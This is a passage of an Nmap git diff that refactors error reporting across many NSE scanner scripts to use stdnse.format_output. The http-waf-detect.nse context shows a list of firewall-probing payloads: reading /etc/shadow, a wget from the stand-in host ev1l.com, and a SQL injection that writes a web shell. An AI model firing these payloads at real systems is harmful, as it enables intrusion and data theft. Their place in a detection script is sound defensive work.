bit.band(string.byte(result, 4), 0x80) == 0x80) then - if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then - return "ERROR: Server refused recursion" - else - return - end + return fail("Server refused recursion") end -- Check error flag if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then - if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then - return "ERROR: Server failure" - else - return - end + return fail("Server failure") end -- Check for two Answer RRs and 1 Authority RR @@ -130,20 +113,12 @@ action = function(host, port) or string.byte(result, 6) ~= 0x01 or string.byte(result, 7) ~= 0x00 or string.byte(result, 8) ~= 0x02) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Response did not include expected answers" - else - return - end + return fail("Response did not include expected answers") end -- We need a minimum of 128 bytes... if (#result < 128) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Truncated response" - else - return - end + return fail("Truncated response") end -- Here is the really fragile part. If the DNS response changes @@ -155,21 +130,13 @@ action = function(host, port) if (string.byte(result, 118) ~= 0x00 or string.byte(result, 119) ~= 0x10) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Answer record not of type TXT" - else - return - end + return fail("Answer record not of type TXT") end -- Check for IN if (string.byte(result, 120) ~= 0x00 or string.byte(result, 121) ~= 0x01) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Answer record not of type IN" - else - return - end + return fail("Answer record not of type IN") end -- Get TXT length @@ -177,11 +144,7 @@ action = function(host, port) -- We now need a minimum of 128 + txtlen bytes + 1... if (#result < 128 + txtlen) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Truncated response" - else - return - end + return fail("Truncated response") end -- GET TXT record diff --git a/scripts/dns-srv-enum.nse b/scripts/dns-srv-enum.nse index 83283c357..0007f551b 100644 --- a/scripts/dns-srv-enum.nse +++ b/scripts/dns-srv-enum.nse @@ -81,8 +81,6 @@ local function parseSvcList(services) end end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - local function parseSrvResponse(resp) local i = 1 if ( resp.answers ) then @@ -153,7 +151,7 @@ action = function(host) } if ( not(checkFilter(services)) ) then - return fail(("Invalid filter (%s) was supplied"):format(arg_filter)) + return stdnse.format_output(false, ("Invalid filter (%s) was supplied"):format(arg_filter)) end local threads, result = {}, {} diff --git a/scripts/dns-update.nse b/scripts/dns-update.nse index 483f92fde..786664459 100644 --- a/scripts/dns-update.nse +++ b/scripts/dns-update.nse @@ -100,7 +100,7 @@ action = function(host, port) nmap.set_port_state(host, port, "open") return stdnse.format_output(true, result) elseif ( err ) then - return "\n ERROR: " .. err + return stdnse.format_output(false, err) end end diff --git a/scripts/domcon-cmd.nse b/scripts/domcon-cmd.nse index e9066f473..6b3a61698 100644 --- a/scripts/domcon-cmd.nse +++ b/scripts/domcon-cmd.nse @@ -96,6 +96,8 @@ local function readAPIBlock( socket ) end +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local socket = nmap.new_socket() @@ -104,9 +106,9 @@ action = function(host, port) local pass = stdnse.get_script_args('domcon-cmd.pass') local cmd = stdnse.get_script_args('domcon-cmd.cmd') - if( not(cmd) ) then return " \n ERROR: No command supplied (see domcon-cmd.cmd)" end - if( not(user)) then return " \n ERROR: No username supplied (see domcon-cmd.user)" end - if( not(pass)) then return " \n ERROR: No password supplied (see domcon-cmd.pass)" end + if( not(cmd) ) then return fail("No command supplied (see domcon-cmd.cmd)") end + if( not(user)) then return fail("No username supplied (see domcon-cmd.user)") end + if( not(pass)) then return fail("No password supplied (see domcon-cmd.pass)") end cmds = stdnse.strsplit(";%s*", cmd) @@ -128,7 +130,7 @@ action = function(host, port) result_part.name = cmds[i] table.insert( result, result_part ) else - return " \n ERROR: " .. result_part + return fail(result_part) end end diff --git a/scripts/giop-info.nse b/scripts/giop-info.nse index 0a8cddc30..8deebf030 100644 --- a/scripts/giop-info.nse +++ b/scripts/giop-info.nse @@ -1,5 +1,6 @@ local giop = require "giop" local shortport = require "shortport" +local stdnse = require "stdnse" description = [[ Queries a CORBA naming server for a list of objects. @@ -57,6 +58,7 @@ local fmt_meta = { end } +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) local helper = giop.Helper:new( host, port ) @@ -66,10 +68,10 @@ action = function(host, port) if ( not(status) ) then return err end status, ctx = helper:GetNamingContext() - if ( not(status) ) then return " \n ERROR: " .. ctx end + if ( not(status) ) then return fail(ctx) end status, objs = helper:ListObjects(ctx) - if ( not(status) ) then return " \n ERROR: " .. objs end + if ( not(status) ) then return fail(objs) end for _, obj in ipairs( objs ) do setmetatable(obj, fmt_meta) diff --git a/scripts/gkrellm-info.nse b/scripts/gkrellm-info.nse index 229f835ec..2bd13af03 100644 --- a/scripts/gkrellm-info.nse +++ b/scripts/gkrellm-info.nse @@ -52,7 +52,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(19150, "gkrellm", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local long_names = { ["fs_mounts"] = "Mounts", diff --git a/scripts/gpsd-info.nse b/scripts/gpsd-info.nse index 577b79d6f..7c421d0e9 100644 --- a/scripts/gpsd-info.nse +++ b/scripts/gpsd-info.nse @@ -50,7 +50,7 @@ local function hasAllData(gpsinfo) return true end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/http-auth-finder.nse b/scripts/http-auth-finder.nse index 25d885590..946c995aa 100644 --- a/scripts/http-auth-finder.nse +++ b/scripts/http-auth-finder.nse @@ -78,7 +78,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-backup-finder.nse b/scripts/http-backup-finder.nse index f99f91056..362d3a619 100644 --- a/scripts/http-backup-finder.nse +++ b/scripts/http-backup-finder.nse @@ -100,7 +100,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-brute.nse b/scripts/http-brute.nse index b1b8facd3..37dbf2644 100644 --- a/scripts/http-brute.nse +++ b/scripts/http-brute.nse @@ -127,7 +127,7 @@ action = function( host, port ) local method = string.upper(stdnse.get_script_args("http-brute.method") or "GET") if ( not(path) ) then - return " \n ERROR: No path was specified (see http-brute.path)" + return stdnse.format_output(false, "No path was specified (see http-brute.path)") end local response = http.generic_request( host, port, method, path, { no_cache = true } ) diff --git a/scripts/http-cisco-anyconnect.nse b/scripts/http-cisco-anyconnect.nse index 584e1e189..80fa77640 100644 --- a/scripts/http-cisco-anyconnect.nse +++ b/scripts/http-cisco-anyconnect.nse @@ -42,7 +42,7 @@ action = function(host, port) local ac = anyconnect.Cisco.AnyConnect:new(host, port) local status, err = ac:connect() if not status then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) else local o = stdnse.output_table() local xmltags = { 'version', 'tunnel-group', 'group-alias', diff --git a/scripts/http-comments-displayer.nse b/scripts/http-comments-displayer.nse index caa5df6b4..ce001ad3a 100644 --- a/scripts/http-comments-displayer.nse +++ b/scripts/http-comments-displayer.nse @@ -108,7 +108,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-csrf.nse b/scripts/http-csrf.nse index 095c5c9e3..125645455 100644 --- a/scripts/http-csrf.nse +++ b/scripts/http-csrf.nse @@ -115,7 +115,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-default-accounts.nse b/scripts/http-default-accounts.nse index bb56535bd..beeff9a2e 100644 --- a/scripts/http-default-accounts.nse +++ b/scripts/http-default-accounts.nse @@ -258,7 +258,8 @@ action = function(host, port) -- Nuclear launch detected! results = http.pipeline_go(host, port, requests, nil) if results == nil then - return "[ERROR] HTTP request table is empty. This should not happen since we at least made one request." + return stdnse.format_output(false, + "HTTP request table is empty. This should not happen since we at least made one request.") end -- Record 404 response, later it will be used to determine if page exists diff --git a/scripts/http-devframework.nse b/scripts/http-devframework.nse index 7fabf6ef2..27aa749f4 100644 --- a/scripts/http-devframework.nse +++ b/scripts/http-devframework.nse @@ -117,7 +117,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-dombased-xss.nse b/scripts/http-dombased-xss.nse index 262b075e6..2a22c9b1c 100644 --- a/scripts/http-dombased-xss.nse +++ b/scripts/http-dombased-xss.nse @@ -96,7 +96,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-domino-enum-passwords.nse b/scripts/http-domino-enum-passwords.nse index 8b49459d7..738645119 100644 --- a/scripts/http-domino-enum-passwords.nse +++ b/scripts/http-domino-enum-passwords.nse @@ -207,6 +207,7 @@ local function saveIDFile( filename, data ) return true end +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) @@ -226,7 +227,7 @@ action = function(host, port) -- A user was provided, attempt to authenticate if ( user ) then if (not(isValidCredential( vhost or host, port, path, user, pass )) ) then - return " \n ERROR: The provided credentials where invalid" + return fail("The provided credentials were invalid") end else local c = creds.Credentials:new(creds.ALL_DATA, host, port) @@ -240,7 +241,7 @@ action = function(host, port) end if not pass then local msg = has_creds and "No valid credentials were found" or "No credentials supplied" - return string.format(" \n ERROR: %s (see domino-enum-passwords.username and domino-enum-passwords.password)", msg) + return fail(("%s (see domino-enum-passwords.username and domino-enum-passwords.password)"):format(msg)) end end end @@ -253,9 +254,9 @@ action = function(host, port) if ( not(pager) ) then if ( http_response.body and http_response.body:match(".*.*" ) ) then - return " \n ERROR: Failed to authenticate" + return fail("Failed to authenticate") else - return " \n ERROR: Failed to process results" + return fail("Failed to process results") end end pos = 1 diff --git a/scripts/http-errors.nse b/scripts/http-errors.nse index 11332bbb4..c68279903 100644 --- a/scripts/http-errors.nse +++ b/scripts/http-errors.nse @@ -91,7 +91,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-feed.nse b/scripts/http-feed.nse index 3ab483e98..903b7530c 100644 --- a/scripts/http-feed.nse +++ b/scripts/http-feed.nse @@ -106,7 +106,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-fetch.nse b/scripts/http-fetch.nse index 79f296f4e..767970d2f 100644 --- a/scripts/http-fetch.nse +++ b/scripts/http-fetch.nse @@ -133,7 +133,7 @@ local function fetch_recursively(host, port, url, destination, patterns, output) local status, r = crawler:crawl() if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-fileupload-exploiter.nse b/scripts/http-fileupload-exploiter.nse index 7b53c543b..01b3fd59d 100644 --- a/scripts/http-fileupload-exploiter.nse +++ b/scripts/http-fileupload-exploiter.nse @@ -237,7 +237,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-google-malware.nse b/scripts/http-google-malware.nse index d594671cd..01cd8dff2 100644 --- a/scripts/http-google-malware.nse +++ b/scripts/http-google-malware.nse @@ -53,6 +53,8 @@ local function build_qry(apikey, url) return string.format("https://sb-ssl.google.com/safebrowsing/api/lookup?client=%s&apikey=%s&appver=1.5.2&pver=3.0&url=%s", SCRIPT_NAME, apikey, url) end +local function fail (err) return stdnse.format_output(false, err) end + --- --MAIN --- @@ -72,8 +74,7 @@ action = function(host, port) local target_url = stdnse.get_script_args("http-google-malware.url") or string.format("%s://%s", port.service, target) if string.len(apikey) < 25 then - return string.format("[ERROR] No API key found. Update the variable APIKEY in %s or set it in the argument %s.api", - SCRIPT_NAME, SCRIPT_NAME) + return fail(("No API key found. Use the %s.api argument"):format(SCRIPT_NAME)) end stdnse.debug1("Checking host %s", target_url) @@ -82,7 +83,7 @@ action = function(host, port) stdnse.debug2("%s", qry) if ( req.status > 400 ) then - return "[ERROR] Request failed (invalid API key?)" + return fail("Request failed (invalid API key?)") end --The Safe Lookup API responds with a type when site is on the lists diff --git a/scripts/http-grep.nse b/scripts/http-grep.nse index 84f50bd63..b368316ed 100644 --- a/scripts/http-grep.nse +++ b/scripts/http-grep.nse @@ -259,7 +259,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-headers.nse b/scripts/http-headers.nse index cec781fbf..22bd778b9 100644 --- a/scripts/http-headers.nse +++ b/scripts/http-headers.nse @@ -33,6 +33,8 @@ categories = {"discovery", "safe"} portrule = shortport.http +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/" local useget = stdnse.get_script_args(SCRIPT_NAME..".useget") @@ -54,19 +56,11 @@ action = function(host, port) end if(result == nil) then - if(nmap.debugging() > 0) then - return "ERROR: Header request failed" - else - return nil - end + return fail("Header request failed") end if(result.rawheader == nil) then - if(nmap.debugging() > 0) then - return "ERROR: Header request didn't return a proper header" - else - return nil - end + return fail("Header request didn't return a proper header") end table.insert(result.rawheader, "(Request type: " .. request_type .. ")") diff --git a/scripts/http-icloud-findmyiphone.nse b/scripts/http-icloud-findmyiphone.nse index 239d65421..27db4de9a 100644 --- a/scripts/http-icloud-findmyiphone.nse +++ b/scripts/http-icloud-findmyiphone.nse @@ -45,7 +45,7 @@ local function decodeString(str) return str:gsub("\226\128\153", "'") end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function() diff --git a/scripts/http-icloud-sendmsg.nse b/scripts/http-icloud-sendmsg.nse index 1321c0182..010e223f6 100644 --- a/scripts/http-icloud-sendmsg.nse +++ b/scripts/http-icloud-sendmsg.nse @@ -58,7 +58,7 @@ local function decodeString(str) return str:gsub("\226\128\153", "'") end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function listDevices(mm) local status, devices = mm:getDevices() diff --git a/scripts/http-iis-webdav-vuln.nse b/scripts/http-iis-webdav-vuln.nse index 97c6ffe2f..e78aad6ca 100644 --- a/scripts/http-iis-webdav-vuln.nse +++ b/scripts/http-iis-webdav-vuln.nse @@ -151,6 +151,8 @@ local function go(host, port) return true, results, is_vulnerable end +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) -- Start by checking if '/' is protected -- if it is, we can't do the tests local result = go_single(host, port, "/") @@ -179,7 +181,7 @@ action = function(host, port) else stdnse.debug1("PROPFIND request failed.") end - return nmap.verbosity() > 0 and "ERROR: This web server is not supported." or nil + return fail("This web server is not supported.") end end @@ -200,7 +202,7 @@ action = function(host, port) local status, results, is_vulnerable = go(host, port) if(status == false) then - return nmap.verbosity() > 0 and "ERROR: " .. results or nil + return fail(results) else if(#results == 0) then if(is_vulnerable == false) then diff --git a/scripts/http-method-tamper.nse b/scripts/http-method-tamper.nse index 6677b3e62..fa6c086a7 100644 --- a/scripts/http-method-tamper.nse +++ b/scripts/http-method-tamper.nse @@ -128,7 +128,7 @@ vulnerabilities via HTTP verb tampering. This is often found in web servers that local status, r = crawler:crawl() if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-open-redirect.nse b/scripts/http-open-redirect.nse index 9846b535c..ac47f419e 100644 --- a/scripts/http-open-redirect.nse +++ b/scripts/http-open-redirect.nse @@ -97,7 +97,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-phpself-xss.nse b/scripts/http-phpself-xss.nse index 42efe3997..e2f009ef6 100644 --- a/scripts/http-phpself-xss.nse +++ b/scripts/http-phpself-xss.nse @@ -133,7 +133,7 @@ PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Refl local status, r = crawler:crawl() if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-proxy-brute.nse b/scripts/http-proxy-brute.nse index 945fe9053..62711c7f8 100644 --- a/scripts/http-proxy-brute.nse +++ b/scripts/http-proxy-brute.nse @@ -103,7 +103,7 @@ action = function(host, port) local status, err = checkProxy(host, port, arg_url) if ( not(status) ) then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) end local engine = brute.Engine:new(Driver, host, port) diff --git a/scripts/http-referer-checker.nse b/scripts/http-referer-checker.nse index b6828388f..f41fd28ff 100644 --- a/scripts/http-referer-checker.nse +++ b/scripts/http-referer-checker.nse @@ -61,7 +61,7 @@ action = function(host, port) local status, r = crawler:crawl() if (not(status)) then if (r.err) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-rfi-spider.nse b/scripts/http-rfi-spider.nse index 7bfb48729..9bd089248 100644 --- a/scripts/http-rfi-spider.nse +++ b/scripts/http-rfi-spider.nse @@ -171,7 +171,7 @@ function action(host, port) if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-sitemap-generator.nse b/scripts/http-sitemap-generator.nse index 614031402..836d443fa 100644 --- a/scripts/http-sitemap-generator.nse +++ b/scripts/http-sitemap-generator.nse @@ -137,7 +137,7 @@ function action(host, port) if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-sql-injection.nse b/scripts/http-sql-injection.nse index dfd5275f1..efe54ed64 100644 --- a/scripts/http-sql-injection.nse +++ b/scripts/http-sql-injection.nse @@ -235,7 +235,7 @@ action = function(host, port) local status, r = crawler:crawl() if (not(status)) then if (r.err) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-stored-xss.nse b/scripts/http-stored-xss.nse index bff2cb436..da1a3de27 100644 --- a/scripts/http-stored-xss.nse +++ b/scripts/http-stored-xss.nse @@ -183,7 +183,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end @@ -247,7 +247,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, ("ERROR: %s"):format(r.reason)) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-unsafe-output-escaping.nse b/scripts/http-unsafe-output-escaping.nse index cdb373fcd..9e6a4e17a 100644 --- a/scripts/http-unsafe-output-escaping.nse +++ b/scripts/http-unsafe-output-escaping.nse @@ -131,7 +131,7 @@ action = function(host, port) -- most of them are "legitimate" and should not be reason to abort if ( not(status) ) then if ( r.err ) then - return stdnse.format_output(true, "ERROR: %s", r.reason) + return stdnse.format_output(false, r.reason) else break end diff --git a/scripts/http-userdir-enum.nse b/scripts/http-userdir-enum.nse index 579723165..13cad79cb 100644 --- a/scripts/http-userdir-enum.nse +++ b/scripts/http-userdir-enum.nse @@ -41,7 +41,7 @@ categories = {"auth", "intrusive"} portrule = shortport.http - +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) @@ -52,21 +52,13 @@ action = function(host, port) -- speedy exit if no usernames if(#usernames == 0) then - if(nmap.debugging() > 0) then - return "Didn't find any users to test (should be in nselib/data/usernames.lst)" - else - return nil - end + return fail("Didn't find any users to test (should be in nselib/data/usernames.lst)") end -- Check what response we get for a 404 local result, result_404, known_404 = http.identify_404(host, port) if(result == false) then - if(nmap.debugging() > 0) then - return "ERROR: " .. result_404 - else - return nil - end + return fail(result_404) end -- Check if we can use HEAD requests @@ -93,11 +85,7 @@ action = function(host, port) -- Check for http.pipeline error if(results == nil) then stdnse.debug1("http.pipeline returned nil") - if(nmap.debugging() > 0) then - return "ERROR: http.pipeline returned nil" - else - return nil - end + return fail("http.pipeline returned nil") end local found = {} diff --git a/scripts/http-virustotal.nse b/scripts/http-virustotal.nse index 4a4635e69..27f3e688d 100644 --- a/scripts/http-virustotal.nse +++ b/scripts/http-virustotal.nse @@ -208,7 +208,7 @@ local function parseScanReport(report) return result end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function() diff --git a/scripts/http-vlcstreamer-ls.nse b/scripts/http-vlcstreamer-ls.nse index 53004db5c..3dc2e7370 100644 --- a/scripts/http-vlcstreamer-ls.nse +++ b/scripts/http-vlcstreamer-ls.nse @@ -54,7 +54,7 @@ portrule = shortport.port_or_service(54340, "vlcstreamer", "tcp") local arg_dir = stdnse.get_script_args(SCRIPT_NAME .. ".dir") or "/" -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/http-vuln-cve2011-3368.nse b/scripts/http-vuln-cve2011-3368.nse index 49ea7fe04..4e3e6e7bd 100644 --- a/scripts/http-vuln-cve2011-3368.nse +++ b/scripts/http-vuln-cve2011-3368.nse @@ -85,7 +85,7 @@ servers to remote users who send carefully crafted requests.]], local bypass_request = http.pipeline_go(host,port, all) if ( not(bypass_request) ) then stdnse.debug1("got no answers from pipelined queries") - return "\n ERROR: Got no answers from pipelined queries" + return stdnse.format_output(false, "Got no answers from pipelined queries") end diff --git a/scripts/http-vuln-cve2014-2126.nse b/scripts/http-vuln-cve2014-2126.nse index 4c01d9f0a..a6d801186 100644 --- a/scripts/http-vuln-cve2014-2126.nse +++ b/scripts/http-vuln-cve2014-2126.nse @@ -2,6 +2,7 @@ local anyconnect = require('anyconnect') local shortport = require('shortport') local vulns = require('vulns') local sslcert = require('sslcert') +local stdnse = require "stdnse" description = [[ Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM @@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.2 before 8.2(5.47), 8.4 befor local ac = anyconnect.Cisco.AnyConnect:new(host, port) local status, err = ac:connect() if not status then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) else local ver = ac:get_version() if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then diff --git a/scripts/http-vuln-cve2014-2127.nse b/scripts/http-vuln-cve2014-2127.nse index c90258ae6..ea2578900 100644 --- a/scripts/http-vuln-cve2014-2127.nse +++ b/scripts/http-vuln-cve2014-2127.nse @@ -2,6 +2,7 @@ local anyconnect = require('anyconnect') local shortport = require('shortport') local vulns = require('vulns') local sslcert = require('sslcert') +local stdnse = require "stdnse" description = [[ Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN @@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.x before 8.2(5.48), 8.3 befor local ac = anyconnect.Cisco.AnyConnect:new(host, port) local status, err = ac:connect() if not status then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) else local ver = ac:get_version() if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then diff --git a/scripts/http-vuln-cve2014-2128.nse b/scripts/http-vuln-cve2014-2128.nse index ec922a85c..3c74b9c43 100644 --- a/scripts/http-vuln-cve2014-2128.nse +++ b/scripts/http-vuln-cve2014-2128.nse @@ -2,6 +2,7 @@ local anyconnect = require('anyconnect') local shortport = require('shortport') local vulns = require('vulns') local sslcert = require('sslcert') +local stdnse = require "stdnse" description = [[ Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN @@ -71,7 +72,7 @@ The SSL VPN implementation in Cisco Adaptive Security Appliance (ASA) Software 8 local ac = anyconnect.Cisco.AnyConnect:new(host, port) local status, err = ac:connect() if not status then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) else local ver = ac:get_version() if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then diff --git a/scripts/http-vuln-cve2014-2129.nse b/scripts/http-vuln-cve2014-2129.nse index 661673f26..c56bc8e80 100644 --- a/scripts/http-vuln-cve2014-2129.nse +++ b/scripts/http-vuln-cve2014-2129.nse @@ -2,6 +2,7 @@ local anyconnect = require('anyconnect') local shortport = require('shortport') local vulns = require('vulns') local sslcert = require('sslcert') +local stdnse = require "stdnse" description = [[ Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP @@ -68,7 +69,7 @@ The SIP inspection engine in Cisco Adaptive Security Appliance (ASA) Software 8. local ac = anyconnect.Cisco.AnyConnect:new(host, port) local status, err = ac:connect() if not status then - return ("\n ERROR: %s"):format(err) + return stdnse.format_output(false, err) else local ver = ac:get_version() if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then diff --git a/scripts/http-waf-detect.nse b/scripts/http-waf-detect.nse index 96de8b5b2..a30a5f0cd 100644 --- a/scripts/http-waf-detect.nse +++ b/scripts/http-waf-detect.nse @@ -66,6 +66,8 @@ local attack_vectors_n2 = {"?p4yl04d=cat%20/etc/shadow", "?p4yl04d=id;uname%20-a "?p4yl04d=", "?p4yl04d=wget%20http://ev1l.com/xpl01t.txt", "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php'--"} +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local orig_req, tests local path = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" @@ -79,7 +81,7 @@ action = function(host, port) if orig_req.status and orig_req.body then stdnse.debug3("Normal HTTP response -> Status:%d Body:\n%s", orig_req.status, orig_req.body) else - return "[ERROR] Initial HTTP request failed" + return fail("Initial HTTP request failed") end --if aggro mode on, try all vectors if aggro then @@ -97,7 +99,7 @@ action = function(host, port) local test_results = http.pipeline_go(host, port, tests) if test_results == nil then - return "[ERROR] HTTP request table is empty. This should not ever happen because we at least made one request." + return fail("HTTP request table is empty. This should not ever happen because we at least made one request.") end diff --git a/scripts/icap-info.nse b/scripts/icap-info.nse index f62d83975..812978047 100644 --- a/scripts/icap-info.nse +++ b/scripts/icap-info.nse @@ -40,7 +40,7 @@ categories = {"safe", "discovery"} portrule = shortport.port_or_service(1344, "icap") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function parseResponse(resp) if ( not(resp) ) then diff --git a/scripts/imap-brute.nse b/scripts/imap-brute.nse index 2c4f14be4..82d23e6b9 100644 --- a/scripts/imap-brute.nse +++ b/scripts/imap-brute.nse @@ -99,6 +99,7 @@ Driver = } +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) @@ -106,9 +107,9 @@ action = function(host, port) -- authentication mechanisms can be determined local helper = imap.Helper:new(host, port) local status = helper:connect() - if (not(status)) then return "\n ERROR: Failed to connect to the server." end + if (not(status)) then return fail("Failed to connect to the server.") end local status, capabilities = helper:capabilities() - if (not(status)) then return "\n ERROR: Failed to retrieve capabilities." end + if (not(status)) then return fail("Failed to retrieve capabilities.") end -- check if an authentication mechanism was provided or try -- try them in the mech_prio order @@ -129,7 +130,7 @@ action = function(host, port) -- if no mechanisms were found, abort if ( not(mech) ) then - return "\n ERROR: No suitable authentication mechanism was found" + return fail("No suitable authentication mechanism was found") end local engine = brute.Engine:new(Driver, host, port) diff --git a/scripts/imap-capabilities.nse b/scripts/imap-capabilities.nse index 1a459ec84..62fc6a7c1 100644 --- a/scripts/imap-capabilities.nse +++ b/scripts/imap-capabilities.nse @@ -25,13 +25,15 @@ categories = {"default", "safe"} portrule = shortport.port_or_service({143, 993}, {"imap", "imaps"}) +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local helper = imap.Helper:new(host, port) local status = helper:connect() - if ( not(status) ) then return "\n ERROR: Failed to connect to server" end + if ( not(status) ) then return fail("Failed to connect to server") end local status, capa = helper:capabilities(host, port) - if( not(status) ) then return "\n ERROR: Failed to retrieve capabilities" end + if( not(status) ) then return fail("Failed to retrieve capabilities") end helper:close() if type(capa) == "table" then diff --git a/scripts/informix-query.nse b/scripts/informix-query.nse index 81cceceb7..2a13076c0 100644 --- a/scripts/informix-query.nse +++ b/scripts/informix-query.nse @@ -67,7 +67,7 @@ action = function( host, port ) user = nmap.registry['informix-brute'][1]["username"] pass = nmap.registry['informix-brute'][1]["password"] else - return " \n ERROR: No credentials specified (see informix-table.username and informix-table.password)" + return 